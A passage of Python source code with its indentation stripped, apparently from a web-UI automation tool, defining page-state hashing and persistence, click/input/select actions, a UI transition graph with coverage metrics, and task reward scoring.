# return elements that contain content
# leaf_elements = self.clickable_elements + self.unclickable_elements
leaf_elements = self.clickable_elements + self.unactionable_elements
content_elements = []
clusters = Element.cluster_elements(leaf_elements)
for cluster_id in clusters:
cluster_elements = clusters[cluster_id]
if cluster_elements[0].tag_name != "LABEL" and len(cluster_elements) > 4:
continue
content_elements.extend(cluster_elements)
return content_elements
@lazy_property
def id2elements(self):
return dict([(ele.id, ele) for ele in self.elements])
@lazy_property
def root_element(self):
return self.elements[0]
@lazy_property
def text(self):
return self.root_element.inner_text
@lazy_property
def text_in_window(self):
text = ""
for ele in self.elements_in_window:
text += " " + ele.own_text
return text
@lazy_property
def content_text(self):
text = ""
for ele in self.content_elements:
text += " " + ele.own_text
return text
@lazy_property
def image_hash(self):
import imagehash
return imagehash.dhash(self.screenshot, hash_size=10).__str__() if self.screenshot else "unknown_image_hash"
@lazy_property
def task_specific_hash(self):
assert self.task is not None
action_strs = []
for action in self.possible_actions:
action_strs.append(action.action_str)
for text_re in self.task.query_words + self.task.target_text_res:
action_strs.append("%s:%s" % (text_re, re.search(text_re, self.text_in_window, re.IGNORECASE) is None))
action_strs = "\n".join(action_strs)
m = Utils.md5(action_strs)
return m
@lazy_property
def task_independent_hash(self):
ele_strs = set()
for ele in self.actionable_elements:
if not ele:
continue
if len(ele.own_text) > 30:
continue
ele_action_types = ",".join(ele.acceptable_action_types)
ele_str = "%s %s %s %s" % (ele_action_types, ele.xpath, ele.own_text, ele.style_str)
ele_strs.add(ele_str)
all_ele_str = "\n".join(sorted(ele_strs))
m = Utils.md5(all_ele_str)
return m
@lazy_property
def action_set_hash(self):
action_strs = []
for action in self.possible_actions:
if not action.element:
continue
action_str = "%s %s %s" % (action.action_str, action.element, action.element.style_str)
action_strs.append(action_str)
action_strs = "\n".join(action_strs)
m = Utils.md5(action_strs)
return m
@lazy_property
def state_str(self):
# return self.task_specific_hash[:10] + self.image_hash[:6]
if self.loaded_state_str:
return self.loaded_state_str
return self.task_independent_hash
def same_form_elements(self, element):
ele_form = element.parent_form
elements = []
if ele_form:
submit_elements = []
for ele in ele_form.all_child_elements:
if ele.acceptable_action_types:
if ele.type == "submit":
submit_elements.append(ele)
else:
elements.append(ele)
elements.extend(submit_elements)
else:
for ele in self.actionable_elements:
if Action.INPUT_TEXT in ele.acceptable_action_types or \
Action.SELECT in ele.acceptable_action_types:
elements.append(ele)
return elements
def setup(self, task):
assert isinstance(task, Task)
# Setup the state
self.task = task
for ele in self.elements:
if not task.in_window_only or ele.in_window:
self.possible_actions.extend(ele.get_acceptable_actions(task))
self.finish_action = Action.finish()
# self.possible_actions.append(self.finish_action)
def same_as(self, state_):
return self.state_str == state_.state_str
@lazy_property
def possible_action_strs(self):
return set([action.action_str for action in self.possible_actions])
def is_page_changed(self, last_state):
# Whether this state is changed from last state
return not self.possible_action_strs.issubset(last_state.possible_action_strs)
def is_error_page(self):
# Whether current state is an error page
if len(self.possible_action_strs) == 0:
return True
error_messages = [
"not found",
"server error"
]
for error_msg in error_messages:
if re.search(error_msg, self.text_in_window, re.IGNORECASE):
return True
return False
def get_parent(self, element):
parent_id = element.ele_dict["parent"]
return self.id2elements[parent_id] if parent_id != -1 else None
def get_child_elements(self, element):
child_eles = []
for child_ele_id in element.ele_dict["children"]:
child_ele = self.id2elements[child_ele_id]
child_eles.append(child_ele)
return child_eles
def get_common_parent(self, elements):
paths_to_root = []
path_to_root = []
for element in elements:
path_to_root = [ele.id for ele in element.path_to_root]
paths_to_root.append(path_to_root)
for ele_id in path_to_root:
is_common_parent = True
for path in paths_to_root:
if ele_id not in path:
is_common_parent = False
break
if is_common_parent:
return self.id2elements[ele_id]
return None
def contains_words(self, words, document=None):
if document is None:
document = self.text_in_window
if not words:
return True
for word in words:
if word not in document:
return False
return True
def url_matches(self, url_res):
if not url_res:
return True
for url_re in url_res:
if not re.search(url_re, self.url):
return False
return True
def _get_action_match_ratio_matrix(self, query_words):
match_ratio_matrix = []
for query_word in query_words:
action_match_ratios = []
for action in self.possible_actions:
action_text = action.element.inner_text if action.action_type == Action.INPUT_TEXT else action.value
action_match_ratios.append(difflib.SequenceMatcher(None, query_word, action_text).ratio())
match_ratio_matrix.append(action_match_ratios)
return np.array(match_ratio_matrix)
def save(self, state_dir, replace=False, resize=None, file_name=None):
if not os.path.exists(state_dir):
os.makedirs(state_dir)
if file_name is None:
file_name = self.state_str
state_json_path = os.path.join(state_dir, file_name + ".json")
state_image_path = os.path.join(state_dir, file_name + ".png")
if replace or (not os.path.exists(state_image_path)):
if self.screenshot:
screen = self.screenshot.resize(resize, Image.ANTIALIAS) if resize else self.screenshot
screen.save(state_image_path)
if replace or (not os.path.exists(state_json_path)):
json.dump(self.state_dict, open(state_json_path, "w"), indent=1)
def save_to_zip(self, zip_path, replace=False):
if not zip_path:
return False
try:
zip_file = ZipFile(zip_path, mode="a", compression=COMPRESS_METHOD)
state_json_path = "states/" + self.state_str + ".json"
state_image_path = "states/" + self.state_str + ".png"
json_exists = True if state_json_path in zip_file.namelist() else False
image_exists = True if state_image_path in zip_file.namelist() else False
if replace or (not json_exists):
state_json_str = json.dumps(self.state_dict, indent=1)
zip_file.writestr(state_json_path, state_json_str)
if replace or (not image_exists):
screen = self.screenshot.resize([240, 240], Image.ANTIALIAS)
image_file = BytesIO()
screen.save(image_file, "PNG")
# Here zf is a zipfile writer
zip_file.writestr(state_image_path, image_file.getvalue())
zip_file.close()
return zip_file
except:
traceback.print_exc()
return None
@staticmethod
def load(state_dir, state_str):
if state_dir and state_str:
if state_dir.endswith(".zip"):
return State.load_from_zip(zip_path=state_dir, state_str=state_str)
state_json_path = os.path.join(state_dir, state_str + ".json")
state_image_path = os.path.join(state_dir, state_str + ".png")
state_dict = json.load(open(state_json_path))
state_image = Image.open(state_image_path)
state = State(state_dict=state_dict, screenshot=state_image)
state.loaded_state_str = state_str
return state
return None
@staticmethod
def load_from_zip(zip_path, state_str):
try:
zip_file = ZipFile(zip_path, mode="r")
state_json_path = "states/" + state_str + ".json"
state_image_path = "states/" + state_str + ".png"
state_dict = json.load(zip_file.open(state_json_path))
state_image = Image.open(zip_file.open(state_image_path))
state = State(state_dict=state_dict, screenshot=state_image)
state.loaded_state_str = state_str
zip_file.close()
return state
except:
# traceback.print_exc()
pass
try:
zip_file = ZipFile(zip_path, mode="r")
state_json_path = state_str + ".json"
state_image_path = state_str + ".png"
state_dict = json.load(zip_file.open(state_json_path))
state_image = Image.open(zip_file.open(state_image_path))
state = State(state_dict=state_dict, screenshot=state_image)
state.loaded_state_str = state_str
zip_file.close()
return state
except:
# traceback.print_exc()
return None
def get_action(self, action_str):
for action in self.possible_actions:
if action.action_str == action_str:
return action
m = re.match(ACTION_RE, action_str)
if m:
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
action_element = self.get_element_by_locator(target_locator)
if action_element:
return Action(element=action_element, action_type=action_type, value=value)
return None
def get_element_by_locator(self, locator):
locator_xpaths = locator.split(" || ")
matched_ele = None
max_match_count = 0
for ele in self.elements:
ele_xpaths = ele.locator.split(" || ")
ele_match_count = sum([(1 if locator_xpath in ele_xpaths else 0) for locator_xpath in locator_xpaths])
if ele_match_count > max_match_count:
max_match_count = ele_match_count
matched_ele = ele
return matched_ele
def included_actions(self, actions):
included_actions = []
for action in actions:
if not action.element:
continue
action_element = self.get_element_by_locator(action.element.xpath)
if action_element:
included_actions.append(action)
return included_actions
def interacted_elements(self, actions):
elements_in_this_state = []
elements_not_in_this_state = []
for action in actions:
if not action.element:
continue
action_element = self.get_element_by_locator(action.element.xpath)
if action_element:
if action_element not in elements_in_this_state:
elements_in_this_state.append(action_element)
else:
if action.element not in elements_not_in_this_state:
elements_not_in_this_state.append(action.element)
return elements_in_this_state, elements_not_in_this_state
class Action:
RESET = "reset"
FINISH = "finish"
CLICK = "click"
CHECK = "check"
SELECT = "select"
INPUT_TEXT = "input_text"
PRESS_ENTER = "press_enter"
def __init__(self, element, action_type, value):
self.element = element
self.action_type = action_type
self.value = value
def to_dict(self):
return {
"action_type": self.action_type,
"target": self.element.id,
"value": self.value
}
@staticmethod
def finish():
return Action(None, Action.FINISH, "")
@lazy_property
def value_text(self):
if not self.element:
return ""
if self.action_type == Action.SELECT:
selected_index = int(self.value)
if "actionSet" in self.element.ele_dict \
and "options" in self.element.ele_dict["actionSet"] \
and len(self.element.ele_dict["actionSet"]["options"]) > selected_index:
return Utils.force_to_str(self.element.ele_dict["actionSet"]["options"][selected_index])
else:
return "ERROR"
elif self.action_type == Action.INPUT_TEXT:
return self.value
elif self.action_type == Action.CLICK:
return self.element.inner_text
elif self.action_type == Action.CHECK:
return self.element.inner_text
else:
return self.value
@lazy_property
def value_text_parsed(self):
return Utils.parse(self.value_text)
@lazy_property
def surrounding_words(self):
words = []
# words.append(self.action_type)
if self.element is not None:
words.extend(self.element.inner_text_list)
# neighbour_ele = self.element.get_neighbour_element()
# if neighbour_ele:
# words.extend(neighbour_ele.own_text_list)
if self.value_text in words:
words.remove(self.value_text)
return words
@lazy_property
def surrounding_words_parsed(self):
words = []
for word in self.surrounding_words:
words.append(Utils.parse(word))
return words
@lazy_property
def action_str(self):
ele_xpath = self.element.xpath_short if self.element else ""
return "%s #%s# @ %s" % (self.action_type, self.value, ele_xpath)
@lazy_property
def norm_action_str(self):
if self.action_type in [Action.INPUT_TEXT, Action.SELECT]:
return re.sub(r"#.*#", "#?#", self.action_str)
else:
return re.sub(r"\d+", "?", self.action_str)
@lazy_property
def is_submit(self):
if self.action_type == Action.CLICK and self.element and self.element.type == "submit":
return True
if self.action_type == Action.PRESS_ENTER:
return True
return False
@lazy_property
def is_input(self):
return self.action_type in [Action.INPUT_TEXT, Action.SELECT]
@staticmethod
def cluster_actions(actions):
cluster_id_to_actions = {}
for action in actions:
if action.norm_action_str not in cluster_id_to_actions:
cluster_id_to_actions[action.norm_action_str] = []
cluster_id_to_actions[action.norm_action_str].append(action)
return cluster_id_to_actions
@lazy_property
def replay_api(self):
ele_locator = self.element.locator if self.element else ""
return "%s #%s# @ %s" % (self.action_type, self.value, ele_locator)
@lazy_property
def unique_id(self):
ele_xpath = self.element.xpath if self.element else ""
return "%s #%s# @ %s" % (self.action_type, self.value, ele_xpath)
def match_score(self, action):
score = Utils.text_similarity(self.value_text_parsed, action.value_text_parsed)
if self.action_type != action.action_type:
score *= 0.8
return score
def __str__(self):
return "%s %s @ %s" % (self.action_type, self.value_text, self.element)
class UTG:
"""
UI transition graph for web pages
"""
def __init__(self, start_url="", states_dir=None, save_states=False, name="", **kwargs):
self.logger = logging.getLogger(self.__class__.__name__)
self.start_url = start_url
self.states_dir = states_dir
self.save_states = save_states
self.zip_path = None
self.utg_dir = None
self.name = name
self.G = nx.DiGraph()
self.ineffective_action_strs = set()
self.action_next_state_count = {}
self.action_count = 0
self.start_time = datetime.now()
def _context_action_str(self, action, state):
return state.state_str[:4] + ": " + action.action_str
def add_transition(self, action, old_state, new_state):
self.add_state(old_state)
self.add_state(new_state)
# make sure the states are not None
if not old_state or not new_state:
return
action_str = self._context_action_str(action, old_state)
self.action_count += 1
self.add_action_target_state(action_str, new_state.state_str)
self.G.nodes[old_state.state_str]["tried_action_strs"].append(action_str)
if old_state.state_str == new_state.state_str:
self.ineffective_action_strs.add(action_str)
else:
if (old_state.state_str, new_state.state_str) not in self.G.edges():
self.G.add_edge(old_state.state_str, new_state.state_str, actions={})
self.G[old_state.state_str][new_state.state_str]["actions"][action_str] = self.action_count
def add_state(self, state):
if state and (state.state_str not in self.G.nodes()):
self.G.add_node(state.state_str,
url=state.url,
action_strs=[self._context_action_str(action, state) for action in state.possible_actions],
tried_action_strs=[])
if self.save_states and self.utg_dir:
states_dir = os.path.join(self.utg_dir, "states")
state.save(states_dir)
if self.save_states and self.zip_path:
state.save_to_zip(self.zip_path)
def get_state(self, state_str):
if self.utg_dir:
states_dir = os.path.join(self.utg_dir, "states")
return State.load(states_dir, state_str)
if self.zip_path:
return State.load_from_zip(self.zip_path, state_str)
def add_init_state(self, state):
self.add_state(state)
self.add_action_target_state(Action.RESET, state.state_str)
def get_init_state_str(self):
next_state_weights = self.get_next_state_weights()
useless_state_strs = set()
for state_str in next_state_weights:
if not self.G[state_str]:
useless_state_strs.add(state_str)
for state_str in useless_state_strs:
next_state_weights.pop(state_str)
return Utils.weighted_choice(next_state_weights)
def get_next_state_weights(self, action=None, state=None):
"""
The next states with weights
:param action:
:return:
"""
action_str = self._context_action_str(action, state) if action else Action.RESET
return self.action_next_state_count[action_str] if action_str in self.action_next_state_count else None
def is_ineffective(self, action, state):
action_str = self._context_action_str(action, state) if action else Action.RESET
return action_str in self.ineffective_action_strs
def add_action_target_state(self, action_str, state_str):
if action_str not in self.action_next_state_count:
self.action_next_state_count[action_str] = {}
if state_str in self.action_next_state_count[action_str]:
self.action_next_state_count[action_str][state_str] += 1
else:
self.action_next_state_count[action_str][state_str] = 1
def get_utg_dict(self):
utg_nodes = []
utg_edges = []
for state_str in self.G.nodes():
action_strs = self.G.nodes[state_str]["action_strs"]
tried_action_strs = self.G.nodes[state_str]["tried_action_strs"]
state_url = self.G.nodes[state_str]["url"]
state_desc = UTG.list_to_html_table([
("url", state_url),
("state_str", state_str)
])
utg_node = {
"id": state_str,
"label": state_url,
"state_str": state_str,
"action_strs": action_strs,
"tried_action_strs": tried_action_strs,
"ineffective_action_strs": list(self.ineffective_action_strs.intersection(action_strs)),
"title": state_desc,
"shape": "image",
"image": "states/" + state_str + ".png"
}
if state_str in self.action_next_state_count[Action.RESET]:
utg_node["font"] = "14px Arial red"
utg_nodes.append(utg_node)
for state_transition in self.G.edges():
from_state = state_transition[0]
to_state = state_transition[1]
actions = self.G[from_state][to_state]["actions"]
action_short_descs = []
action_list = []
for action_str, action_id in sorted(actions.items(), key=lambda x: x[1]):
action_short_descs.append((action_id, action_str))
action_list.append({
"action_str": action_str,
"action_id": action_id
})
utg_edge = {
"from": from_state,
"to": to_state,
"id": from_state + "-->" + to_state,
"title": UTG.list_to_html_table(action_short_descs),
"label": ", ".join([str(x["action_id"]) for x in action_list]),
"actions": action_list
}
utg_edges.append(utg_edge)
utg = {
"nodes": utg_nodes,
"edges": utg_edges,
"num_nodes": len(utg_nodes),
"num_edges": len(utg_edges),
"test_date": self.start_time.strftime("%Y-%m-%d %H:%M:%S"),
"time_spent": (datetime.now() - self.start_time).total_seconds(),
"start_url": self.start_url,
"action_count": self.action_count,
"action_next_state_count": self.action_next_state_count,
"ineffective_action_strs": list(self.ineffective_action_strs)
}
return utg
def save(self, utg_dir=None):
"""
Output current UTG to a directory
"""
if not utg_dir:
utg_dir = self.utg_dir
if not utg_dir:
return
if not os.path.exists(utg_dir):
os.makedirs(utg_dir)
utg_file_path = os.path.join(utg_dir, "utg.js")
utg_file = open(utg_file_path, "w")
utg_dict = self.get_utg_dict()
utg_json = json.dumps(utg_dict, indent=1)
utg_file.write("var utg = \n")
utg_file.write(utg_json)
utg_file.close()
# Copy HTML/JS files
utg_index_dst = os.path.join(utg_dir, "index.html")
utg_stylesheets_dst = os.path.join(utg_dir, "stylesheets")
if not os.path.exists(utg_index_dst):
utg_index_src = os.path.join(".", "resources", "utg_visualization", "index.html")
shutil.copyfile(utg_index_src, utg_index_dst)
# utg_index_html = open(utg_index_src).read().replace("utg.js", self.name + "utg.js")
# open(utg_index_dst, "w").write(utg_index_html)
if not os.path.exists(utg_stylesheets_dst):
utg_stylesheets_src = os.path.join(".", "resources", "utg_visualization", "stylesheets")
shutil.copytree(utg_stylesheets_src, utg_stylesheets_dst)
def save_to_zip(self):
"""
output current UTG to a zip file
:return:
"""
if not self.zip_path:
return None
try:
utg_dict = self.get_utg_dict()
utg_json_str = "var utg = \n" + json.dumps(utg_dict, indent=1)
js_file_path = self.zip_path[:-4] + ".js"
with open(js_file_path, "w") as js_file:
js_file.write(utg_json_str)
zip_file = ZipFile(self.zip_path, mode="a", compression=COMPRESS_METHOD)
zip_file.writestr("utg.js", utg_json_str)
zip_file.close()
return zip_file
except:
return
@staticmethod
def load_from_zip(zip_path):
if not zip_path:
return None
utg_name = os.path.basename(zip_path)[:-len("utg.zip")]
try:
zip_file = ZipFile(zip_path, mode="r", compression=COMPRESS_METHOD)
utg_lines = zip_file.open("utg.js").readlines()[1:]
utg_body = "\n".join([line.decode() for line in utg_lines])
utg_dict = json.loads(utg_body)
utg = UTG.create_utg_from_dict(utg_name, utg_dict)
utg.zip_path = zip_path
return utg
except Exception as e:
print(e)
print("No UTG found in %s" % zip_path)
utg = UTG(name=utg_name)
utg.zip_path = zip_path
return utg
@staticmethod
def load_from_dir(utg_dir_path):
if not utg_dir_path:
return None
utg_dir_path = os.path.dirname(os.path.join(utg_dir_path, "utg.js"))
utg_name = os.path.basename(utg_dir_path)[:-len("utg")]
try:
utg_js_path = os.path.join(utg_dir_path, "utg.js")
utg_file = open(utg_js_path)
utg_body = "".join(utg_file.readlines()[1:])
utg_file.close()
utg_dict = json.loads(utg_body)
utg = UTG.create_utg_from_dict(utg_name, utg_dict)
utg.utg_dir = utg_dir_path
return utg
except Exception as e:
print(e)
print("No UTG found in %s" % utg_dir_path)
utg = UTG(name=utg_name)
utg.utg_dir = utg_dir_path
return utg
@staticmethod
def load_utgs_from_dir(utgs_dir):
utgs = []
if not utgs_dir:
return utgs
for root, dirs, files in os.walk(utgs_dir):
for dir in dirs:
if dir.endswith("_utg"):
dir_path = os.path.join(root, dir)
utg = UTG.load_from_dir(dir_path)
utgs.append(utg)
for f in files:
if f.endswith("_utg.zip"):
file_path = os.path.join(root, f)
utg = UTG.load_from_zip(file_path)
utgs.append(utg)
return utgs
@staticmethod
def create_utg_from_dict(utg_name, utg_dict):
utg = UTG(name=utg_name, **utg_dict)
for node in utg_dict["nodes"]:
state_str = node["state_str"]
state_url = node["label"]
action_strs = node["action_strs"]
tried_action_strs = node["tried_action_strs"]
utg.G.add_node(state_str, url=state_url, action_strs=action_strs, tried_action_strs=tried_action_strs)
for edge in utg_dict["edges"]:
old_state_str = edge["from"]
new_state_str = edge["to"]
for action_dict in edge["actions"]:
action_str = action_dict["action_str"]
action_id = action_dict["action_id"]
if (old_state_str, new_state_str) not in utg.G.edges():
utg.G.add_edge(old_state_str, new_state_str, actions={})
utg.G[old_state_str][new_state_str]["actions"][action_str] = action_id
utg.action_next_state_count = utg_dict["action_next_state_count"]
utg.ineffective_action_strs.update(utg_dict["ineffective_action_strs"])
utg.action_count = utg_dict["action_count"]
return utg
def get_action_coverages(self, state_or_str, n_steps):
if not state_or_str or n_steps <= 0:
return {}
if isinstance(state_or_str, State):
return {action: self.get_action_coverage(self._context_action_str(action, state_or_str), n_steps)
for action in state_or_str.possible_actions}
else:
action_strs = self.G.nodes[state_or_str]["action_strs"] if state_or_str in self.G.nodes else []
return {action_str: self.get_action_coverage(action_str, n_steps)
for action_str in action_strs}
def get_state_coverage(self, state_str, n_steps):
action_coverages = self.get_action_coverages(state_str, n_steps)
if not action_coverages:
return 1.0, 1.0
covered = total = 0.0
for action_covered, action_total in action_coverages.values():
covered += action_covered
total += action_total
return covered, total
def get_action_coverage(self, action_str, n_steps):
"""
get number of covered paths and total paths of given action in given number of steps
:param action_str:
:param n_steps:
:return: #covered, #total
"""
if action_str not in self.action_next_state_count:
return 0.0, 10.0 # 10 is the estimated number of actions per state
next_state_count = self.action_next_state_count[action_str]
next_state_count_sum = sum(next_state_count.values())
covered = total = 0.0
for state_str in next_state_count:
state_weight = float(next_state_count[state_str]) / next_state_count_sum
state_covered, state_total = self.get_state_coverage(state_str, n_steps - 1)
covered += state_weight * state_covered
total += state_weight * state_total
return covered, total
@staticmethod
def list_to_html_table(dict_data):
table = "<table class=\"table\">\n"
for (key, value) in dict_data:
table += "<tr><th>%s</th><td>%s</td></tr>\n" % (key, value)
table += "</table>"
return table
class Task:
def __init__(self, start_url, query_words=None, query_annotations=None, in_window_only=True, included_url_res=None,
target_url_res=None, target_text_res=None, target_state_str=None, necessary_actions=None,
demonstration=None, states_dir=None, name="", replayable=False, target_url=None, **kwargs):
self.name = name
self.logger = logging.getLogger("Task(%s)" % self.name)
self.query_words = query_words if query_words else []
self.query_annotations = query_annotations if query_annotations else [""] * len(query_words)
if len(self.query_words) != len(self.query_annotations):
raise RuntimeError("The query length doesn't match the query annotation length: " + name)
self.use_annotations = GLOBAL_CONFIGS["use_annotations"]
self.start_url = start_url
self.step_limit = len(self.query_words_parsed) + 3
self.in_window_only = in_window_only
self.included_url_res = included_url_res if included_url_res else []
# self.included_url_res.append(Utils.get_host(start_url))
self.target_url_res = target_url_res if target_url_res else []
self.target_text_res = target_text_res if target_text_res else []
self.target_state_str = target_state_str
self.target_url = target_url
self.necessary_actions = necessary_actions
self.demonstration = demonstration
self.demo_tasks = None
self.demo_task = None
self.states_dir = states_dir
self.task_str = "%s in %s" % (" ".join(self.query_words), self.start_url)
self.replayable = replayable
self.utg = UTG(start_url=start_url, states_dir=self.states_dir, name=name)
self.__reset_progress()
def __reset_progress(self):
self.step = 0
self.action_history = []
self.state_history = []
self.state = None
self.reward = 0
self.total_reward = 0
self.reward_history = []
self.scores = [0.0] * len(self.score_items)
self.done = False
self.target_achieved = False
@lazy_property
def query_words_parsed(self):
words = [Utils.parse(word) for word in self.query_words]
return words
@lazy_property
def query_annotations_parsed(self):
if not self.use_annotations:
return [""] * len(self.query_annotations)
words = [Utils.parse(word) for word in self.query_annotations]
return words
@lazy_property
def all_words_parsed(self):
words = set(self.query_words_parsed + self.query_annotations_parsed)
for surrounding_word_list in self.surrounding_words_parsed:
for word in surrounding_word_list:
words.add(word)
if "" in words:
words.remove("")
return words
@lazy_property
def parameter_ids(self):
word_ids = []
for i, word in enumerate(self.query_words_parsed):
word_annotation = self.query_annotations[i]
if word_annotation:
word_ids.append(i)
return word_ids
@lazy_property
def parameter_annotations_parsed(self):
words = []
for i in self.parameter_ids:
words.append(self.surrounding_words_parsed[i])
return words
@lazy_property
def parameter_values(self):
words = []
for i in self.parameter_ids:
words.append(self.query_words[i])
return words
@lazy_property
def parameter_values_parsed(self):
words = []
for i in self.parameter_ids:
words.append(self.query_words_parsed[i])
return words
def get_action_parameter_index(self, action):
# get the index of the action word in the task query
if action.action_type in [Action.INPUT_TEXT, Action.SELECT]:
action_value = action.value_text_parsed
max_sim_idx = self.get_parameter_index(parameter=action_value)
if max_sim_idx > -1:
return max_sim_idx
return -1
def get_parameter_index(self, parameter):
max_sim = 0.5
max_sim_idx = -1
for i in self.parameter_ids:
entity_word_parsed = self.query_words_parsed[i]
similarity = Utils.text_similarity(entity_word_parsed, parameter)
if similarity > max_sim:
max_sim = similarity
max_sim_idx = i
return max_sim_idx
def get_parameter_surrounding_word_parsed(self, parameter):
para_idx = self.get_parameter_index(parameter)
if para_idx > -1:
surrounding_words_parsed = self.surrounding_words_parsed[para_idx]
if isinstance(surrounding_words_parsed, list):
if len(surrounding_words_parsed) > 0:
return surrounding_words_parsed[0]
else:
return surrounding_words_parsed
return ""
@lazy_property
def surrounding_words_parsed(self):
surrounding_words_list = []
for i, word in enumerate(self.query_words_parsed):
# surrounding_words_i = set()
# if i - 1 >= 0:
# prefix_word = self.query_words_parsed[i - 1]
# surrounding_words_i.add(prefix_word)
# if i + 1 < len(self.query_words_parsed):
# suffix_word = self.query_words_parsed[i + 1]
# if Utils.is_number(word) and (suffix_word not in EXCLUDE_QUERY_WORDS):
# surrounding_words_i.add(suffix_word)
# word_annotation = self.query_annotations_parsed[i]
# if word_annotation:
# surrounding_words_i.add(word_annotation)
# Heuristics added on 10/17/2019, merge surrounding words to one word
surrounding_words_i = []
if i - 1 >= 0:
prefix_word = self.query_words_parsed[i - 1]
surrounding_words_i.append(prefix_word)
word_annotation = self.query_annotations_parsed[i]
if word_annotation and word_annotation not in surrounding_words_i:
surrounding_words_i.append(word_annotation)
if i + 1 < len(self.query_words_parsed):
suffix_word = self.query_words_parsed[i + 1]
if Utils.is_number(word) and \
(suffix_word not in EXCLUDE_QUERY_WORDS) and \
(suffix_word not in surrounding_words_i):
surrounding_words_i.append(suffix_word)
# surrounding_words_i = [" ".join(surrounding_words_i)]
surrounding_words_i = [word for word in surrounding_words_i if word not in EXCLUDE_QUERY_WORDS]
surrounding_words_list.append(surrounding_words_i)
return surrounding_words_list
@lazy_property
def non_parameters_parsed(self):
words = set()
for i, word in enumerate(self.query_words_parsed):
if word in EXCLUDE_QUERY_WORDS:
continue
if self.query_annotations[i]:
words.add(self.query_annotations_parsed[i])
else:
words.add(word)
if "" in words:
words.remove("")
return sorted(words)
def snapshot(self, step=None):
task_snapshot = copy.copy(self)
if step is None or step == self.step:
task_snapshot.action_history = copy.copy(self.action_history)
task_snapshot.state_history = copy.copy(self.state_history)
task_snapshot.reward_history = copy.deepcopy(self.reward_history)
task_snapshot.scores = copy.copy(self.scores)
elif 0 <= step < self.step:
task_snapshot.__reset_progress()
task_snapshot.step = step
task_snapshot.state = self.state_history[step]
task_snapshot.state_history = copy.copy(self.state_history[:step])
task_snapshot.action_history = copy.copy(self.action_history[:step])
task_snapshot.reward_history = copy.deepcopy(self.reward_history[:step])
if len(task_snapshot.reward_history) > 0:
task_snapshot.reward, task_snapshot.total_reward, task_snapshot.scores = task_snapshot.reward_history[-1]
else:
self.logger.warning("Task.snapshot failed with step: " + step)
task_snapshot = None
return task_snapshot
def get_coverage(self):
return self.utg.get_action_coverage(Action.RESET, self.step_limit + 1)
def reset(self, state, update_utg=True):
assert isinstance(state, State)
self.__reset_progress()
if update_utg:
self.utg.add_init_state(state)
self.state = state
self._evaluate()
def update(self, action, new_state, update_utg=True):
assert isinstance(action, Action)
if update_utg:
self.utg.add_transition(action=action, old_state=self.state, new_state=new_state)
self.action_history.append(action)
self.state_history.append(self.state)
if new_state:
# Ensure self.state not being None
self.state = new_state
self._evaluate()
self.reward_history.append([self.reward, self.total_reward, self.scores])
self.step += 1
if new_state is None:
self.done = True
return self.reward, self.done
def get_action_coverages(self):
step_limit = self.step_limit - len(self.action_history)
return self.utg.get_action_coverages(self.state, step_limit)
def get_input_probability(self, input_text):
if self.state and self.state.actionable_text_set:
input_text = input_text.lower()
similarity = max([Utils.text_similarity(input_text, text)
for text in self.state.actionable_text_set])
return 1 - similarity
else:
return 1
@lazy_property
def score_items(self):
items = [
["step_count"],
["action_spatial_distance"],
["action_direction"]
# ["similarity_with_demo_actions"],
# ["similarity_with_demo_surrounding"]
]
items.append(["similarity_with_non_parameters", self.non_parameters_parsed])
for i in self.parameter_ids:
para_val = self.query_words_parsed[i]
para_anno = self.surrounding_words_parsed[i]
items.append(["similarity_with_parameters", para_val, para_anno])
# for i in range(len(entity_words) - 1):
# entity_word_i = entity_words[i]
# for j in range(i + 1, len(entity_words)):
# entity_word_j = entity_words[j]
# items.append(["distance_between_parameters", entity_word_i, entity_word_j])
return items
@property
def score_weights(self):
weights = []
for reward_item in self.score_items:
item = reward_item[0]
if item in REWARD_ITEM_WEIGHTS:
weights.append(REWARD_ITEM_WEIGHTS[item])
else:
weights.append(0)
return weights
def query_achieved_scores(self):
sim_non_para = 0.0
sim_paras = []
for i, reward_item in enumerate(self.score_items):
reward_key = reward_item[0]
if reward_key in ["similarity_with_non_parameters"]:
sim_non_para = self.scores[i]
elif reward_key in ["similarity_with_parameters"]:
sim_paras.append(self.scores[i])
return sim_non_para, sim_paras
def compute_scores(self):
scores = []
# elements to compute reward with
inside_elements, outside_elements = self.state.interacted_elements(self.action_history)
previous_clicked_elements = []
previous_input_values = []
for action in self.action_history:
if action.element and action.action_type == Action.CLICK and action.element in outside_elements:
previous_clicked_elements.append(action.element)
if action.action_type == Action.INPUT_TEXT:
previous_input_values.append(action.value_text_parsed)
content_elements = self.state.content_elements
reward_elements = list(set(inside_elements + content_elements + previous_clicked_elements))
query_word_matches = {}
for i, word in enumerate(self.all_words_parsed):
word_matches = []
is_input = True if word in previous_input_values else False
for ele in reward_elements:
score = ele.max_match_score(word, is_input=is_input)
# importance of 4 types of elements: input_text < content < clicked < select
if score > 0.5:
if is_input:
score *= 0.7 # penalize input value
if ele in previous_clicked_elements:
score *= 1.3
elif Action.SELECT in ele.acceptable_action_types:
score *= 1.6
word_matches.append((ele, score))
query_word_matches[word] = word_matches
for reward_item in self.score_items:
reward_key = reward_item[0]
if reward_key in ["step_count"]:
step_count = 0
for action in self.action_history:
# minimize the number of steps, but encourage submit actions
step_count += (0 if action.is_submit else 1)
scores.append(step_count)
elif reward_key in ["action_spatial_distance"]:
action_spatial_distance = 0
if len(self.action_history) > 1:
distances = []
for i in range(len(self.action_history) - 1):
ele_i = self.action_history[i].element
ele_j = self.action_history[i + 1].element
state_j = self.state_history[i + 1]
if ele_i and ele_j and state_j and state_j.get_element_by_locator(ele_i.xpath):
# if the two actions are in the same page
distance = ele_i.get_shortest_distance(ele_j)
if distance > DISTANCE_THRESHOLD:
distances.append(1.0)
if distances:
action_spatial_distance = np.sum(distances)
scores.append(action_spatial_distance)
elif reward_key in ["action_direction"]:
action_direction = 0
if len(self.action_history) > 1:
for i in range(len(self.action_history) - 1):
action_i = self.action_history[i]
ele_i = action_i.element
if not ele_i:
continue
word_idx_i = self.get_action_parameter_index(action_i)
for j in range(i + 1, len(self.action_history)):
action_j = self.action_history[j]
ele_j = action_j.element
state_j = self.state_history[j]
if not ele_j:
continue
if not state_j.get_element_by_locator(ele_i.xpath):
continue
word_idx_j = self.get_action_parameter_index(action_j)
if 0 <= word_idx_j < word_idx_i:
action_direction += 1.0
# if ele_i.position != ele_j.position \
# and ele_i.position[0] >= ele_j.position[0] \
# and ele_i.position[1] >= ele_j.position[1]:
# action_direction += 1.0
scores.append(action_direction)
elif reward_key in ["similarity_with_demo_actions"]:
if self.demo_task is None \
